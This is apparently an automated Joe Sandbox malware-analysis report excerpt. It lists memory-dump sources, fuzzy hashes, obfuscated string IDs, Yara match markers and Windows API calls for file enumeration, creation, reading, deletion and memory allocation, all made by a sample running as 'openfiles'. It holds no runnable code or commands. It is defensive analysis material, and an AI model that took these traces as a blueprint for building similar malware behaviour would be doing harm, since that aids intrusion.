                                                                                                • Opcode Fuzzy Hash: 6decb2a312256f1c490eb1c3181dd54998a800cd701cde317cd71000d1da2db3
                                                                                                • Instruction Fuzzy Hash: 8431EEB4C15248DBCF24CFDAEA8269DBF35BB04B44F20825CD9502B655D3784A41CF6A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: g{b$"jwl$#fbn$% %4$2?!8$2?!8$6#fb$a wg$a |f$f`a $fln{$gnah$hajk$hj n$j4y2$m<4~$nhj $n{f`$n{f`$wbc#$wbc4${bc$${jw{$~2?!$~2?!
                                                                                                • API String ID: 0-2224445676
                                                                                                • Opcode ID: 938230bfd7590506eb71bf7d8ce03d7d6df892c36e80855a3e715288e9a8db13
                                                                                                • Instruction ID: 84f9bf70da8e1fc3d4717e8a217f8cc33261881e6854fb0bc2c247c7bdbca637
                                                                                                • Opcode Fuzzy Hash: 938230bfd7590506eb71bf7d8ce03d7d6df892c36e80855a3e715288e9a8db13
                                                                                                • Instruction Fuzzy Hash: DE21DDB4C15288DACF24CFDAEA8269DBF35FB04B44F20825CD5503B659C3784A41CF6A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                                                                                                • API String ID: 0-3236418099
                                                                                                • Opcode ID: 32ef01ed4aeec600def25e2640ceb4efd60df2924577ec1a92ddbf81a139b734
                                                                                                • Instruction ID: b61a2abf61f260a695c4d83778096c33c484a6f1d973d6f52054ecafa3d449e0
                                                                                                • Opcode Fuzzy Hash: 32ef01ed4aeec600def25e2640ceb4efd60df2924577ec1a92ddbf81a139b734
                                                                                                • Instruction Fuzzy Hash: D99132B5D00328AADB50DB94DC45FEEBB7DAF44704F4442E9E50CAA140EBB55B84CF61
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                                                                                                • API String ID: 0-3236418099
                                                                                                • Opcode ID: 817d04f0a8311a21daa1257c50d298d8ebc937a4b409f288d70286cc70d68d68
                                                                                                • Instruction ID: 791e6159e7d05683202df9431a048c7abb0e0ac8138542127cee1f90d00c4d88
                                                                                                • Opcode Fuzzy Hash: 817d04f0a8311a21daa1257c50d298d8ebc937a4b409f288d70286cc70d68d68
                                                                                                • Instruction Fuzzy Hash: A141FBB4D003289EEB60DFA5C884BDEBBB9BF04708F5042E9951CAA241D7B54B88CF51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                                                • API String ID: 0-392141074
                                                                                                • Opcode ID: 8f8839db009a5c5c5e0b4d63e5b297a1246051da8522fe4dbb24695c34014762
                                                                                                • Instruction ID: 9738bd9c2ed1be244a2154f31bc03b3a318fbe78d4701211731272f349dfa63a
                                                                                                • Opcode Fuzzy Hash: 8f8839db009a5c5c5e0b4d63e5b297a1246051da8522fe4dbb24695c34014762
                                                                                                • Instruction Fuzzy Hash: A27113B5D10328AADB25DB94CC41FEEB77CBF48704F0442ADE61DAA140EBB567448FA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                                                • API String ID: 0-392141074
                                                                                                • Opcode ID: 90dc514e2ac2d58cef378df0726c4cd7d1533e08a68a04762b80e2601b85066f
                                                                                                • Instruction ID: 8f2d3d01eb6a9ba28de6e36e2e7d6cbaffd5e85fea083af3681d5b3d3657e150
                                                                                                • Opcode Fuzzy Hash: 90dc514e2ac2d58cef378df0726c4cd7d1533e08a68a04762b80e2601b85066f
                                                                                                • Instruction Fuzzy Hash: 466134B5D10328AADB15DB94CC41FEEBB79BF48704F0442ADE61DAA140EBB157488F91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: "$"$"$.$/$P$e$i$m$o$r$x
                                                                                                • API String ID: 0-2356907671
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                                                • API String ID: 0-685823316
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                                                • API String ID: 0-685823316
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: :$:$:$A$I$N$P$m$s$t
                                                                                                • API String ID: 0-2304485323
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: :$:$:$A$I$N$P$m$s$t
                                                                                                • API String ID: 0-2304485323
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: %$@$K$P$Q$R$^$`$k
                                                                                                • API String ID: 0-1256880444
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: L$S$\$a$c$e$l
                                                                                                • API String ID: 0-3322591375
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: L$S$\$a$c$e$l
                                                                                                • API String ID: 0-3322591375
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: #9*.$F$P$T$f$r$x
                                                                                                • API String ID: 0-3632725679
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: F$P$T$f$r$x
                                                                                                • API String ID: 0-2523166886
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $i$l$o$u
                                                                                                • API String ID: 0-2051669658
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $i$l$o$u
                                                                                                • API String ID: 0-2051669658
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 0$1$2$7$F
                                                                                                • API String ID: 0-2632938639
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $e$k$o
                                                                                                • API String ID: 0-3624523832
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $e$h$o
                                                                                                • API String ID: 0-3662636641
                                                                                                • Opcode ID: 3d1442660b2ce80eb3487b77c8909202398cbf57d4da629e36093bdf78ff8f11
                                                                                                • Instruction ID: 5223368343679713f300bbcde599f0edc89bc1b599e8e4707b3b850b3b2d989b
                                                                                                • Opcode Fuzzy Hash: 3d1442660b2ce80eb3487b77c8909202398cbf57d4da629e36093bdf78ff8f11
                                                                                                • Instruction Fuzzy Hash: 63716576E003287EDB54DB94CC85FEE737CAF89204F4042EDB55DA6050EE746B848BA2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $e$k$o
                                                                                                • API String ID: 0-3624523832
                                                                                                • Opcode ID: 6dd6a4c901fd20ae4164b8198d7748bf88e43c283725122deaf8155ce1690fb3
                                                                                                • Instruction ID: bd58511eb581ef4a353030e0a0419db49459985cd746ed960edbbdf634e4be92
                                                                                                • Opcode Fuzzy Hash: 6dd6a4c901fd20ae4164b8198d7748bf88e43c283725122deaf8155ce1690fb3
                                                                                                • Instruction Fuzzy Hash: B6612C75A00708AFDB64DFA4CC84FEFBBBDAF88704F148569E6199B244D730AA41CB50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                                                • API String ID: 0-2877786613
                                                                                                • Opcode ID: 8d8c00838a4b53c1dd723c03b2fa06809e8ae42e946f5109c6a78dfe5b96d427
                                                                                                • Instruction ID: 05f20abd78c1978f0127df0c94f6935c69b02411dc5d50e8afd58336ed0ddb20
                                                                                                • Opcode Fuzzy Hash: 8d8c00838a4b53c1dd723c03b2fa06809e8ae42e946f5109c6a78dfe5b96d427
                                                                                                • Instruction Fuzzy Hash: 503182B99112247EE701EB94CC41FEF7B3C9F49708F144199FA186E180D7B46A418BF6
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                                                • API String ID: 0-2877786613
                                                                                                • Opcode ID: d01a8ef6eefa25690d17bcb1cd20795119a667700bf070aaa34cd2397b4539e9
                                                                                                • Instruction ID: 92726f2978ffcfda5e67d5ddb77a2d10c9e1c052ebdc4e4500eebf979f57a4fe
                                                                                                • Opcode Fuzzy Hash: d01a8ef6eefa25690d17bcb1cd20795119a667700bf070aaa34cd2397b4539e9
                                                                                                • Instruction Fuzzy Hash: 3A3142B5911224BEE701EB94CC41FEF7B3C9F89708F104199F6186E180D7B46A458BF6
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $e$h$o
                                                                                                • API String ID: 0-3662636641
                                                                                                • Opcode ID: c44dd0cef09af8b16febf33bac3e078371e512262fdbacb7450aaa822c17c8fa
                                                                                                • Instruction ID: 94f1c98d05cd1d881257ef6e2e6524c87c7453fd678b7bcf61bc1bcf55203ff0
                                                                                                • Opcode Fuzzy Hash: c44dd0cef09af8b16febf33bac3e078371e512262fdbacb7450aaa822c17c8fa
                                                                                                • Instruction Fuzzy Hash: EC315171D00328BEDF50DB64CC41FEE77B8AF45304F4046E9A55DAA150EA745B848F92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Execution Graph

                                                                                                Execution Coverage:2.6%
                                                                                                Dynamic/Decrypted Code Coverage:4.2%
                                                                                                Signature Coverage:2.2%
                                                                                                Total number of Nodes:454
                                                                                                Total number of Limit Nodes:73

                                                                                                Control-flow Graph

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4109844667.0000000002790000.00000040.80000000.00040000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_2790000_openfiles.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: !$#P$'f$5$A$E]$GV$LS$Lq$M5$V^$W]$]Q$df$hGdf$n$r$s5'f$u$wz$Y
                                                                                                • API String ID: 0-2442523001
                                                                                                • Opcode ID: 767faf5db65cfa230169c3ce95d9430cdd16fe41c7ba38623972b07f8d2c1127
                                                                                                • Instruction ID: fccd20708ba4a8cc67cb7a546edbcce219c824617234cd6348795b630d358c5f
                                                                                                • Opcode Fuzzy Hash: 767faf5db65cfa230169c3ce95d9430cdd16fe41c7ba38623972b07f8d2c1127
                                                                                                • Instruction Fuzzy Hash: EA22CFB0D05229CBEF24CF49D895BDDBBB2FB84308F1081D9D2496B291DBB95A84CF54
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • FindFirstFileW.KERNELBASE(?,00000000), ref: 027ABA54
                                                                                                • FindNextFileW.KERNELBASE(?,00000010), ref: 027ABA8F
                                                                                                • FindClose.KERNELBASE(?), ref: 027ABA9A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4109844667.0000000002790000.00000040.80000000.00040000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_2790000_openfiles.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Find$File$CloseFirstNext
                                                                                                • String ID:
                                                                                                • API String ID: 3541575487-0
                                                                                                • Opcode ID: 71f03317308352be117bacee3b149174ec4786e4d6dbdb6adfdad83eae5caf8b
                                                                                                • Instruction ID: 8d635c106d570f80c28352d630027668bd5192fa937c0d09c34dd840a9159a3b
                                                                                                • Opcode Fuzzy Hash: 71f03317308352be117bacee3b149174ec4786e4d6dbdb6adfdad83eae5caf8b
                                                                                                • Instruction Fuzzy Hash: 49319071A00309ABDB21DB60CC99FEF777CAF94718F104558B909A7180EB70AA94CBA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 027B7956
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4109844667.0000000002790000.00000040.80000000.00040000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_2790000_openfiles.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateFile
                                                                                                • String ID:
                                                                                                • API String ID: 823142352-0
                                                                                                • Opcode ID: b141b2ea81ff45f7cc1e302a86f572fd564148939d79fb991bcaded83421ced7
                                                                                                • Instruction ID: ff44987998252d4f6b8720edb2424068a96534da4ee2e5b232c15993219970f2
                                                                                                • Opcode Fuzzy Hash: b141b2ea81ff45f7cc1e302a86f572fd564148939d79fb991bcaded83421ced7
                                                                                                • Instruction Fuzzy Hash: DD31D2B5A00209AFCB15DF99D880EEFB7B9AF8C310F108219F918A3240D730A951CFA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 027B7A9B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4109844667.0000000002790000.00000040.80000000.00040000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_2790000_openfiles.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FileRead
                                                                                                • String ID:
                                                                                                • API String ID: 2738559852-0
                                                                                                • Opcode ID: d941a54131e1416f7037e37ed3abe75ef1dd9fda57762ad5d2bddd2f986665ad
                                                                                                • Instruction ID: f7b9656de3633a703fd5eb6652a2c1d34ff9f68e5e1908bd5616b2f3df53bac8
                                                                                                • Opcode Fuzzy Hash: d941a54131e1416f7037e37ed3abe75ef1dd9fda57762ad5d2bddd2f986665ad
                                                                                                • Instruction Fuzzy Hash: D031C5B5A00209AFDB15DF59D880EEFB7B9EF8D314F108609F918A7240D670A9118FA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • NtAllocateVirtualMemory.NTDLL(027A14BE,?,027B68E7,00000000,00000004,00003000,?,?,?,?,?,027B68E7,027A14BE,?,027B68E7,00000000), ref: 027B7D5D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4109844667.0000000002790000.00000040.80000000.00040000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_2790000_openfiles.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocateMemoryVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 2167126740-0
                                                                                                • Opcode ID: 7e6ef78cdfbc0ad8ea219b2f708962f147a841bbf8e6734ec7711df11bb163b8
                                                                                                • Instruction ID: 4a360fad4b5f9d0717bcef8a8f0f1c17ad7d701fed8dd0ba93b43d0fe9b80088
                                                                                                • Opcode Fuzzy Hash: 7e6ef78cdfbc0ad8ea219b2f708962f147a841bbf8e6734ec7711df11bb163b8
                                                                                                • Instruction Fuzzy Hash: 0121F6B5A00609AFDB15EF59DC81FEBB7ADEF89310F00850AFD18A7240D770A911CBA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4109844667.0000000002790000.00000040.80000000.00040000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_2790000_openfiles.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DeleteFile
                                                                                                • String ID:
                                                                                                • API String ID: 4033686569-0
                                                                                                • Opcode ID: 61ee255c864caa6baa2e816f9a7872553526579f11e20c66d3257f09a33f6cd1
                                                                                                • Instruction ID: 27bd9d883fd9b9f207bbe77b2613c27663a32f0ab18a87d86385f54a30f16b54
                                                                                                • Opcode Fuzzy Hash: 61ee255c864caa6baa2e816f9a7872553526579f11e20c66d3257f09a33f6cd1
                                                                                                • Instruction Fuzzy Hash: 49018E72600204BFDA11AB64DC45FEB73ADEF85710F00450AFA59A7280DBB07A11CBA6
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 027B7B87
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4109844667.0000000002790000.00000040.80000000.00040000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_2790000_openfiles.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Close
                                                                                                • String ID:
                                                                                                • API String ID: 3535843008-0
                                                                                                • Opcode ID: 21b45c6fd79cad047264b73198e4d8442247cd6b166523d33cd501c473cbfad0
                                                                                                • Instruction ID: 2d4b6d1867d06fe27b0ef611e34a7c3538a8454b320a9b7246fbddfdc3755d66
                                                                                                • Opcode Fuzzy Hash: 21b45c6fd79cad047264b73198e4d8442247cd6b166523d33cd501c473cbfad0
                                                                                                • Instruction Fuzzy Hash: 07E046362002047FDA21AB6ADC41F9BB7ADDFC6764F408516FA8CAB240C770B9118BB1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, Offset: 04870000, based on PE: true
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004999000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000007.00000002.4111044686.000000000499D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_4870000_openfiles.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: f018fd133f1562e6c9c4f89b22465f7c7fe3d76debe3dfe3bb9b5bbba68a657c
                                                                                                • Instruction ID: e3c638b3e962406541efebd0a3f45118f1521e7fa1a0960ddaed81b1adaa53ee
                                                                                                • Opcode Fuzzy Hash: f018fd133f1562e6c9c4f89b22465f7c7fe3d76debe3dfe3bb9b5bbba68a657c
                                                                                                • Instruction Fuzzy Hash: BC90026160150046664071584C044066005DBE2305395C615A255D560C8718D9A9926A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, Offset: 04870000, based on PE: true
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004999000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000007.00000002.4111044686.000000000499D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_4870000_openfiles.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 77382c5dd195b58810c1f08876f3ca9a6e038c7d3f6abcba5a68db9f5578026f
                                                                                                • Instruction ID: 966b36920291fb31c8d85de5be90843bc84d9c3e39c997dccc96ac26010b50d3
                                                                                                • Opcode Fuzzy Hash: 77382c5dd195b58810c1f08876f3ca9a6e038c7d3f6abcba5a68db9f5578026f
                                                                                                • Instruction Fuzzy Hash: AA90023160580016B64071584C845464005DBE1305B55C511E242D554C8B14DAAA5362
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
